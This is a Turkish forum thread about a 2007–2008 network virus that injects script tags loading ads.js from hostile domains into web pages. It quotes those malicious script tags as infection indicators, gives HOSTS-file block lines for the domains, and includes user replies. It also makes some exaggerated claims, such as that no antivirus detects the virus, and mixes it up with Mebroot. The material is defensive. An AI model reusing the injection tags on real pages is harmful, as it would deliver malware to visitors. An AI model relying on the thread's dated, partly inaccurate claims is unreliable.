Son Zamanların En Tehlikeli Virüsü [ads.js]

[VSaBaH]

Son Zamanların En Tehlikeli Virüsü [ads.js]



Son zamanların (Ekim 2007’den beri) en baş belası virüsü (g.asdafdgfgf.com / u.asdafdgfgf.com / hk.www404.cn:53/ads.js) ile ilgili bilgiler burada verilecek ve çözüm önerisi üzerinde durulacaktır. Bu virüs; aynı modeme bağlı olan bütün bilgisayarlarda etkili olmakta ve bilgisayarda çok büyük bir açık meydana getirmektedir. Bu virüsün özelliği, bilgisayarınızda virüs programı olsun olmasın, her hal ü karda bilgisayarınızı etkilemesidir. Ağ üzerinde sadece bir bilgisayarda virüsün bulunması yetmekte ve yüzlerce bilgisayar bu virüsten dolayı güvenlikten uzak bir hale gelmektedir.

LİNKİ GÖREBİLMEK İÇİN LÜTFEN KAYIT OL VEYA GİRİŞ YAP!

Malware .js ve .c dilinde yazılmış bu worm’ların bu sene (2008) internetin korkulu rüyası olacağı ifade edilmektedir. Herhangi bir antivirüs veya anti spy programları bu virüsü çözemiyor. Bu yazılım, şimdiye kadar görülen en etkili kurtçuklardan biridir. Ağ üzerinden yayılıyor, bir javascript ile kendini explorer'a gömüyor. Bu virüsün en önemli özelliklerinden birisi, pc'yi herhangi bir virüs programıyla tarattığımızda herhangi bir virüse rastlanmamasıdır.

Virüs programının, tespit edilmesi zor; kendisini Windows’un içinde gizlemesi dolayısıyla çok tehlikeli olduğunu belirten uzmanlar, bu zararlı programın, sistem dosyalarını değiştirerek dışardan erişime olanak sağlayan ve kendisini gizleyen “rootkit” programcıkları gibi çalıştığını ve kendisini bilgisayarın Master Boot Record (MBR) adı verilen sabit diski üzerine yazdığını kaydediyorlar.

LİNKİ GÖREBİLMEK İÇİN LÜTFEN KAYIT OL VEYA GİRİŞ YAP!

Symantec bilgisayar güvenliği şirketi yetkilileri, Mebroot olarak adlandırılan virüs bir kez kurulduktan sonra çoğunlukla, “keyloggers” adı verilen ve gizli bilgilerin çalınması için klavye vuruşlarını kaydeden programlar gibi diğer zararlı yazılımları da bilgisayara indirdiği uyarısında bulunuyor.

Şimdiye dek 200 binden fazla sisteme bulaşan virüs programlarını hazırlayan ve banka şifre bilgilerini çalmakta uzmanlaşmış Rus hacker grubu tarafından (Rus hackerlerin yaptığı tahmin edilmekle birlikte, Tayland ya da Çin’den yayıldığı da belirtilmektedir) yazılan virüsün ilk olarak ekimde ortaya çıktığını belirten uzmanlar, bu virüsle saldırıların geçen ay başında arttığına dikkat çekiyorlar.

---

İŞTE VİRÜSÜ ANLAMANIN EN ETKİN YOLU!!!

Bu virüsün etkin olduğunu anlamanın yolu;
Internet Explorer tarayıcıda Görünüm sekmesi altındaki KAYNAK,
Firefox tarayıcıda Görünüm linki altında SAYFA KAYNAĞINI GÖSTER,
Netscape tarayıcıda Görünüm veya View linki altında PAGE SOURGE veya SAYFA KAYNAĞI linkine basıp en üstte;

Kod: Tümünü seç

<SCRIPT LANGUAGE="javascript1.2" SRC="http://g.asdafdgfgf.com/ads.js"></SCRIPT>

<SCRIPT LANGUAGE="javascript1.2" SRC="http://222360.com/ads.js"></SCRIPT>

<SCRIPT LANGUAGE="javascript" SRC="http://hk.www404.cn:53/ads.js"></SCRIPT>

biçiminde bir kodun olup olmadığını kontrol etmektir.

Eğer, buna benzer bir Script kodu en üstte yer alıyorsa, bilgisayarınızda yaptığınız bütün işlemlerde açık kapı bırakılmış olmakta ve istenilmesi halinde bütün bilgilerinize ulaşılabilinmektedir. Özellikle bankacılık işlemlerinin yapıldığı bilgisayarlar, belki de bu işten en çok zarar göreceklerden birisidir.

Adı geçen script kodunun en önemli yanlarından birisi de; web sitesindeki javascript dosyasını açmaya çalışması ve bu arada bilgisayar ve internet hızının büyük oranda düşmesidir. Virüs sadece yukarıdaki kodu, girilen tüm sayfalara enjekte etmekle kalmıyor, ağda müthiş bir trafik oluşturuyor, internet bağlantısını yavaşlatıyor hatta çoğu zaman iptal ediyor.

Adı geçen virüs sayfa yapısını alt üst etmekte ve özellikle safyadaki yazıların sadece bazılarını aşırı büyütmekte ve sayfa bazen tanınmayacak hale gelmektedir. Sitenin sağ ve sol tarafındaki menüleri aşağı kaymakta ve sayfa aşağıya doğru doğal olarak uzanmaktadır. Virüs bulaşmış bir bilgisayardan alınan bozuk sayfa örnekleri, bu sayfanın en altında verilmiştir.

---

İŞTE VİRÜSÜN ÇÖZÜM YOLU!!!

Bazı bilgisayarlar aşağıdaki 1. yöntemi kullanarak çözüm bulabilseler de, bu şekilde çözüme kavuşan bilgisayar sayısı yok denecek kadar azdır. İlk denenmesi gereken yol şöyledir:

C:Windows\System32\Drivers\Etc altındaki HOST dosyasını not defteri ile açıp en alta şu satırları eklemek:

Kod: Tümünü seç

127.0.0.1 union.222360.com

127.0.0.1 www.union.222360.com

127.0.0.1 k.222360.com

127.0.0.1 www.k.222360.com

127.0.0.1 s.222360.com

127.0.0.1 v.222360.com

127.0.0.1 asdafdgfgf.com

127.0.0.1 www.asdafdgfgf.com

127.0.0.1 g.asdafdgfgf.com

127.0.0.1 www.g.asdafdgfgf.com

127.0.0.1 hk.www404.cn

Düzenleyip kaydedildikten sonra bilgisayar yeniden başladığında, yine de virüs ektin ise o zaman yapılacak tek şey kalıyor: 2. yöntemi denemek, yani Anti ARP programını kurmak. Bu programı kullanıp da virüsün engellenmediğini belirten kişiye şu ana kadar rastlanmamıştır. Bu programı, aşağıdaki linklerden herhangi birini tıklayarak indirilebilirsiniz:

BURADAN: LİNKİ GÖREBİLMEK İÇİN LÜTFEN KAYIT OL VEYA GİRİŞ YAP!

ALTERNATIF: LİNKİ GÖREBİLMEK İÇİN LÜTFEN KAYIT OL VEYA GİRİŞ YAP!

15 günlük denemeden sonra program serial isteyecektir. Şu an progamın seriali internetten bulunamadığından, program kaldırılıp tekrar kurulduğunda çalışmaya başlayacaktır.

---

İşte Virüs Girmiş Bilgisayarlardan Birkaç Görüntü

İlgili virüsün mevcut olduğu ağa bağlı bir bilgisayardan alınan Hotmail sayfası örneği. Dikkat edileceği gibi, e-mail sayfasındaki yazılar aşırı biçimde büyüdüğünden, sayfa yapısı bozulmuştur.





Umarım yararlı olmuştur...

[Kısmen Altıntıdır]

[VSaBaH]

Ben neden tanıttım bu virüsü? :) Normalde virüslerden yana pek bi problemim olmadı ama bizim ADSL ağından bulaşan bu virüs beni çok uğraştırdı. Sonunda araştırmaya karar verdim. Bir hayli gözü kara bir virüs çıktı :D Paylaşmak istedim...

İşte meşhur virüsten birkaç kare de benden... :)

[By_Furkan]

payalaşımın için sağol inşallah bize bulaşmaz

[servetemekli]

bendede aynı virüsten vcar sanırım aynı makinalar 5 dk içinde kilitleniyo format atmakta çare değil

[VSaBaH]

bendede aynı virüsten vcar sanırım aynı makinalar 5 dk içinde kilitleniyo format atmakta çare değil

Arkadaşım sorun bizzat benim başımdan geçti bu yazıyı diğer forumlardan görüp kopyalamadım yani bizzat araştırıp derledim...

Ben şuan virüsü temizlemiş bulunmaktayım... Ne yaptıysam olmadı temizlenmedi virüs benim bilgisayardan. Bende ağdaki tüm bilgisayarları netten bağlantılarını kestikten sonra teker teker tarattım yukarıdaki programlarla... Ve bilgisayarın tekinde o virüsün kaynağını bulup temizledim. Sonra bana da uğramaz oldu :)

[rainman3624]

deneyeceğim arkadaşım çok teşekkürler internette bu konuyla ilgili en güzel açıklama ellerine sağlık

[sıfır]

arkadaşım süper copy paste yapmışsın programınrapidshare linki patlamış

[NasSsLi]

ya benm bilg. de virüs var ama baktığım da

Internet Explorer tarayıcıda Görünüm sekmesi altındaki KAYNAK da

<SCRIPT LANGUAGE="javascript1.2" SRC="LİNKİ GÖREBİLMEK İÇİN LÜTFEN KAYIT OL VEYA GİRİŞ YAP!>

<SCRIPT LANGUAGE="javascript1.2" SRC="LİNKİ GÖREBİLMEK İÇİN LÜTFEN KAYIT OL VEYA GİRİŞ YAP!>

<SCRIPT LANGUAGE="javascript" SRC="LİNKİ GÖREBİLMEK İÇİN LÜTFEN KAYIT OL VEYA GİRİŞ YAP!>

bunlar yazmıodu:S

[VSaBaH]

arkadaşım süper copy paste yapmışsın programınrapidshare linki patlamış

Birincisi kopyala yapıştır falan yapmadım... Bizzat farklı sitelerden derledim zaten biçim olarak düzenlemesi de bana ait.

İkincisi rapid adresi sağlam.

ya benm bilg. de virüs var ama baktığım da

Internet Explorer tarayıcıda Görünüm sekmesi altındaki KAYNAK da

<SCRIPT LANGUAGE="javascript1.2" SRC="LİNKİ GÖREBİLMEK İÇİN LÜTFEN KAYIT OL VEYA GİRİŞ YAP!>

<SCRIPT LANGUAGE="javascript1.2" SRC="LİNKİ GÖREBİLMEK İÇİN LÜTFEN KAYIT OL VEYA GİRİŞ YAP!>

<SCRIPT LANGUAGE="javascript" SRC="LİNKİ GÖREBİLMEK İÇİN LÜTFEN KAYIT OL VEYA GİRİŞ YAP!>

bunlar yazmıodu:S

Sendeki virüs başka bir çeşit virüs o zaman... Tüm virüslerin belirtisi bu şekilde olacak değil sonuçta...

Antivir antivirüs ile taratmanı öneririm çoğunu buluyor... ;)

[NasSsLi]

Ya demek istediğimi anlatamadım galiba. Bu virüsün aynısı benim bilgisayarda da cıkıo ama baktığımda yok görünüo.